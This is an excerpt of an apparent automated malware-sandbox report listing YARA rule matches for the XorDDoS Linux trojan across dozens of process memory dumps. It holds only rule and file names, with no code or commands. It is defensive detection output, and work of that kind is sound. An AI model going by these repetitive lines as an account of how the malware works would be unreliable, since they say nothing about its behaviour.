        Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
